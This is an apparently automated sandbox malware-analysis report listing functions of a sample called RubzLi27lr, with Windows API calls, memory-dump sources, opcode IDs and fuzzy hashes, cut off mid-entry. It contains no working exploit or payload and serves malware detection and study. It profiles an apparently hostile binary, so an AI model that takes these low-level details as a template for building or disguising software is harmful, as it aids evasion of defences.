                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __fread_nolock
                                                                                                                  • String ID: EA06
                                                                                                                  • API String ID: 2638373210-3962188686
                                                                                                                  • Opcode ID: b6e3a6b58d39e1fa3b3f35aad69937d9185e5dba7ef5c599f1d918d38dbbd97f
                                                                                                                  • Instruction ID: d05667f5f4e947f4bccf35e2c84a86582ed4da1cf3b53cd4943ef48e5b2257b0
                                                                                                                  • Opcode Fuzzy Hash: b6e3a6b58d39e1fa3b3f35aad69937d9185e5dba7ef5c599f1d918d38dbbd97f
                                                                                                                  • Instruction Fuzzy Hash: 1301B5729042687EDF18D7A8C856FEEBBF8DB15301F00859AE157D6281E5B4E6088B60
                                                                                                                  Function 0180CB18 Relevance: 1.7, APIs: 1, Instructions: 163COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0180C388: GetFileAttributesW.KERNELBASE(?), ref: 0180C393
                                                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000), ref: 0180CC62
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2144200342.000000000180B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0180B000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_180b000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesCreateDirectoryFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3401506121-0
                                                                                                                  • Opcode ID: 40d8f815fe7be4bf717deb0523bb32188491e077edadd03834df031e9b0a18f5
                                                                                                                  • Instruction ID: 1d2af44cc715d7ecd3b2327b896e0f84a32a6f5355a781ca64bee9f73dd7099a
                                                                                                                  • Opcode Fuzzy Hash: 40d8f815fe7be4bf717deb0523bb32188491e077edadd03834df031e9b0a18f5
                                                                                                                  • Instruction Fuzzy Hash: 0B517131A1120D96EF14EFA4C844BEF7739EF58300F1085A9A909F72D0EB399B04C7A6
                                                                                                                  Function 00ACFC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ProtectVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 544645111-0
                                                                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                  • Instruction ID: c9002a7a25bee37304568fd78a2d9565a67a3360f6fb281b67c7851b92579f03
                                                                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                  • Instruction Fuzzy Hash: 6F31E274A041099FCB19CF59D480E69FBB2FF49314B2686A9E80ACB656D731EDC1CBC0
                                                                                                                  Function 00AB4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AB4EDD,?,00B81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AB4E9C
                                                                                                                    • Part of subcall function 00AB4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AB4EAE
                                                                                                                    • Part of subcall function 00AB4E90: FreeLibrary.KERNEL32(00000000,?,?,00AB4EDD,?,00B81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AB4EC0
                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00B81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AB4EFD
                                                                                                                    • Part of subcall function 00AB4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AF3CDE,?,00B81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AB4E62
                                                                                                                    • Part of subcall function 00AB4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AB4E74
                                                                                                                    • Part of subcall function 00AB4E59: FreeLibrary.KERNEL32(00000000,?,?,00AF3CDE,?,00B81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AB4E87
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$Load$AddressFreeProc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2632591731-0
                                                                                                                  • Opcode ID: a75ec7d7bb407f92b814943f9103bbdfb17f5f2bbe03f90d5c756776c51cc739
                                                                                                                  • Instruction ID: ac533453b308c8c176ff0d558422c5b4342dfe5335b87a53f4b09563ec1ed635
                                                                                                                  • Opcode Fuzzy Hash: a75ec7d7bb407f92b814943f9103bbdfb17f5f2bbe03f90d5c756776c51cc739
                                                                                                                  • Instruction Fuzzy Hash: 54119432610205AADF14FB74DD02BED77A9AF44B10F104429F542AB1D3DE70DA459B50
                                                                                                                  Function 00AE8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __wsopen_s
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3347428461-0
                                                                                                                  • Opcode ID: d7230ca5f19274cafb776ab7ea4c064896d1ef683f44f470f876111a85612cbb
                                                                                                                  • Instruction ID: 45f727ca1b8899753300c4b449fe1fe0952e8f5d8f3489e505f756ba3806688c
                                                                                                                  • Opcode Fuzzy Hash: d7230ca5f19274cafb776ab7ea4c064896d1ef683f44f470f876111a85612cbb
                                                                                                                  • Instruction Fuzzy Hash: F611187590410AAFCB05DF59E94199A7BF5EF48314F104059F808AB352DA31DA11CBA5
                                                                                                                  Function 00AE5000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AE4C7D: RtlAllocateHeap.NTDLL(00000008,00AB1129,00000000,?,00AE2E29,00000001,00000364,?,?,?,00ADF2DE,00AE3863,00B81444,?,00ACFDF5,?), ref: 00AE4CBE
                                                                                                                  • _free.LIBCMT ref: 00AE506C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 614378929-0
                                                                                                                  • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                                                  • Instruction ID: 3d34528a7ee4316922fa1342fc6df5b7107c4987012451840ade6d42733b9886
                                                                                                                  • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                                                  • Instruction Fuzzy Hash: 9C0149726047446FE3318F6AE885A5AFBECFB89370F25052DF184832C0EA70A905C7B4
                                                                                                                  Function 00ADE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                                  • Instruction ID: a1a631cea72e0dde5e261a3255bd646860ed68e43a301ce94c6f9bdd53593630
                                                                                                                  • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                                  • Instruction Fuzzy Hash: 13F02832511A149AD7317B7A8E05B9B339C9F52334F10071BF4279B3D2DB74E80286A5
                                                                                                                  Function 00AE4C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,00AB1129,00000000,?,00AE2E29,00000001,00000364,?,?,?,00ADF2DE,00AE3863,00B81444,?,00ACFDF5,?), ref: 00AE4CBE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  • Opcode ID: 842f8e665158d7d84370121a10f445e455150a4f6eed7dfe8eaa9ddf9ac4bfe0
                                                                                                                  • Instruction ID: cc784e4c33a79362d9d51da698157abeb2ba93d519395b3cec15ef59ddfcebec
                                                                                                                  • Opcode Fuzzy Hash: 842f8e665158d7d84370121a10f445e455150a4f6eed7dfe8eaa9ddf9ac4bfe0
                                                                                                                  • Instruction Fuzzy Hash: E4F0E2316073A477DB215F639D09B9B379CBFC9BA0B344522B81AAB690CE30D80186E0
                                                                                                                  Function 00AE3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00B81444,?,00ACFDF5,?,?,00ABA976,00000010,00B81440,00AB13FC,?,00AB13C6,?,00AB1129), ref: 00AE3852
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  • Opcode ID: f1903ec99ebc764e9a0aedc32fb11271e6d0eaf0b05abfc6708c1d5a626bf8ce
                                                                                                                  • Instruction ID: a3561fe34de22dff11f18d85d68889dc1fe02092f966c511e5cecf596d1a8703
                                                                                                                  • Opcode Fuzzy Hash: f1903ec99ebc764e9a0aedc32fb11271e6d0eaf0b05abfc6708c1d5a626bf8ce
                                                                                                                  • Instruction Fuzzy Hash: 28E065331022A477DE313B779D09B9B3759AB82BB0F150122BD5697591DF21DE0182E1
                                                                                                                  Function 00AB4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNEL32(?,?,00B81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AB4F6D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3664257935-0
                                                                                                                  • Opcode ID: 37351c96d53976344cc2df5061c71eb3b975dc2a585577e0c1fb9f528ecb1296
                                                                                                                  • Instruction ID: 7a20600935978f033899f08e7845c9cddef83394304c0008c04194a1e9ee6104
                                                                                                                  • Opcode Fuzzy Hash: 37351c96d53976344cc2df5061c71eb3b975dc2a585577e0c1fb9f528ecb1296
                                                                                                                  • Instruction Fuzzy Hash: E4F01571505752CFDB349F74D5908A2BBF8AF18B29320896EE1EA83623CB319844DF10
                                                                                                                  Function 00AB2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AB2DC4
                                                                                                                    • Part of subcall function 00AB6B57: _wcslen.LIBCMT ref: 00AB6B6A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LongNamePath_wcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 541455249-0
                                                                                                                  • Opcode ID: 9e7c5e8362a24433dcc4364410fa7bfbab0b197ed02eef1262a74d27903b8dba
                                                                                                                  • Instruction ID: c7daa0199082484c5377645472f9ab69254a54ca24156586e5e17f0783bee4a9
                                                                                                                  • Opcode Fuzzy Hash: 9e7c5e8362a24433dcc4364410fa7bfbab0b197ed02eef1262a74d27903b8dba
                                                                                                                  • Instruction Fuzzy Hash: 43E0CD766011245BC71096989C05FEA77EDDFC8790F040071FD09D7248D9A4AD808650
                                                                                                                  Function 00B22693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __fread_nolock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2638373210-0
                                                                                                                  • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                                                                                  • Instruction ID: 06bf1ece2069cf14e96dfe41b1a347b891eab7e406aae1ffeb275aa9e95e1e36
                                                                                                                  • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                                                                                  • Instruction Fuzzy Hash: 0EE04FB1609B105FDF39AF28A9517F677E8DF49300F00086EF69FC2352E57268458A4D
                                                                                                                  Function 00AB2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AB3908
                                                                                                                    • Part of subcall function 00ABD730: GetInputState.USER32 ref: 00ABD807
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00AB2B6B
                                                                                                                    • Part of subcall function 00AB30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00AB314E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3667716007-0
                                                                                                                  • Opcode ID: ae55ed24133b46dab8332d833c95cbe11c724be5abd2bc1484596b8e8da4b135
                                                                                                                  • Instruction ID: b5f6cd6e695e5f8e599cfa567a523b2761b11f48e7e1290d7873c3c979e6e239
                                                                                                                  • Opcode Fuzzy Hash: ae55ed24133b46dab8332d833c95cbe11c724be5abd2bc1484596b8e8da4b135
                                                                                                                  • Instruction Fuzzy Hash: 89E0863370524406CA04BBB499525EDA75D9BD1751F44197EF14243263DE2446468752
                                                                                                                  Function 0180C388 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesW.KERNELBASE(?), ref: 0180C393
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2144200342.000000000180B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0180B000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_180b000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3188754299-0
                                                                                                                  • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                  • Instruction ID: 3476980cb381299a8871bd9c7b5cbb9f20ebb27aac8a4f8f600f8cedea3d433d
                                                                                                                  • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                  • Instruction Fuzzy Hash: A8E08C3092520CEBDB92CEA88D04AAE7BA8EB04320F004796AA06C32C1D6318B50D694
                                                                                                                  Function 0180C358 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesW.KERNELBASE(?), ref: 0180C363
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2144200342.000000000180B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0180B000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_180b000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3188754299-0
                                                                                                                  • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                  • Instruction ID: 31e0b8891bdf8dbd29672d97e5226fc0884c3f5668f747ceb68168e3c1e169c1
                                                                                                                  • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                  • Instruction Fuzzy Hash: B5D0A730A1520CEBCB60CFB89D089DD73A8D706365F004794FD15D32D0D6319B009754
                                                                                                                  Function 00AF039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNELBASE(00000000,00000000,?,00AF0704,?,?,00000000,?,00AF0704,00000000,0000000C), ref: 00AF03B7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 823142352-0
                                                                                                                  • Opcode ID: 3336b2d1049a6926cc7b3f47ad10f1cb42d68b5eff2f495c7f08f4af25c0d55b
                                                                                                                  • Instruction ID: 62278dee17c1b6488572371c6113de4f56d4c3d4a3edd9143d65c66ffa1071d0
                                                                                                                  • Opcode Fuzzy Hash: 3336b2d1049a6926cc7b3f47ad10f1cb42d68b5eff2f495c7f08f4af25c0d55b
                                                                                                                  • Instruction Fuzzy Hash: 22D06C3204010DBBDF028F84DD06EDA3FAAFB48714F014000BE1866020C732E921AB90
                                                                                                                  Function 00AB1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00AB1CBC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
